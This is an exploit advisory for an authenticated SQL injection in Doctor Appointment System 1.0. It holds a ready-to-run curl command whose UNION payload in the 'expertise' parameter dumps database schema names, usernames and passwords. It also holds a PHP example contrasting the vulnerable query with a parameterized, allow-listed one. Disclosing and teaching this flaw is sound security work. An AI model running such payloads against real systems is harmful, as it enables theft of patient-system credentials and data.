Doctor Appointment System 1.0 SQL Injection

2021.02.09
Credit: Nakul Ratti
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Doctor Appointment System 1.0 - Authenticated SQL Injection
# Date: 2021-02-09
# Exploit Author: Soham Bakore, Nakul Ratti
# Vendor Homepage: https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
# Software Link: https://www.sourcecodester.com/php/14182/doctor-appointment-system.html
# Version: V1.0

Vulnerable File:
----------------
http://host/patient/search_result.php

Vulnerable Issue:
-----------------
Expertise parameter has no input validation

POC:
----
1] Login as a normal patient user
2] Insert cookie after successful login in the below command:

curl -i -s -o tmp -k -X $'POST' \
-H $'Host: 192.168.1.12' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 288' -H $'Connection: close' -H $'Cookie: PHPSESSID=b85jccq5ns65d75g69j2uj37hf' -H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=b85jccq5ns65d75g69j2uj37hf' \
--data-binary $'expertise=Bone\'+union+select+concat(\'Username-\',username),2,3,(select+(%40a)+from+(select(%40a%3a%3d0x00),(select+(%40a)+from+(information_schema.schemata)where+(%40a)in+(%40a%3a%3dconcat(%40a,schema_name,\'<br>\'))))a),concat(\'Password\',\'-\',password),6,7,8,9,10,11,12+from+users%23&submit=' \
$'http://host/patient/search_result.php'

3] Check the tmp file for sensitive information from the database.

------------------
Kindly let us know if any other information is required.
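
The missing validation on the expertise parameter, shown as an added example beside a hardened form (this is not the application's own code). It assumes a reduced stand-in schema on in-memory SQLite via PDO: the `doctors` table, its columns and the function names are hypothetical, and only `users`, `username` and `password` are names taken from the payload above.

```php
<?php
// Added example: stand-in schema on in-memory SQLite (the real application uses MySQL).
// `doctors` and its columns are hypothetical; `users`, `username` and `password`
// are the names that appear in the advisory's payload.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE doctors (name TEXT, expertise TEXT)");
$db->exec("CREATE TABLE users (username TEXT, password TEXT)");
$db->exec("INSERT INTO doctors VALUES ('Dr. A', 'Bone'), ('Dr. B', 'Heart')");
$db->exec("INSERT INTO users VALUES ('alice', 'constructed-hash-1')");

// Vulnerable pattern: the POST value is concatenated into the SQL text,
// so a quote in the input ends the string literal and the rest is parsed as SQL.
function searchVulnerable(PDO $db, string $expertise): array
{
    $sql = "SELECT name, expertise FROM doctors WHERE expertise = '$expertise'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened pattern: the value is bound as a parameter, travels separately
// from the SQL text, and is only ever compared as data.
function searchHardened(PDO $db, string $expertise): array
{
    $stmt = $db->prepare("SELECT name, expertise FROM doctors WHERE expertise = :expertise");
    $stmt->execute([':expertise' => $expertise]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Defence in depth: reject values that cannot be a specialty name
// before they reach the query at all (hypothetical allow-list).
function isValidExpertise(string $expertise): bool
{
    return preg_match('/^[A-Za-z .\-]{1,64}$/', $expertise) === 1;
}

// Constructed inputs: one legitimate value, one shaped like the advisory's UNION payload.
$inputs = ["Bone", "Bone' UNION SELECT username, password FROM users --"];
foreach ($inputs as $input) {
    printf("input: %s\n", $input);
    printf("  passes validation: %s\n", isValidExpertise($input) ? 'yes' : 'no');
    printf("  vulnerable rows:   %d\n", count(searchVulnerable($db, $input)));
    printf("  hardened rows:     %d\n", count(searchHardened($db, $input)));
}
```

With the second input the concatenated query returns a row from `users` in addition to the doctor row, while the bound query treats the whole string as a specialty name and matches nothing.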



Copyright 2021, cxsecurity.com

 
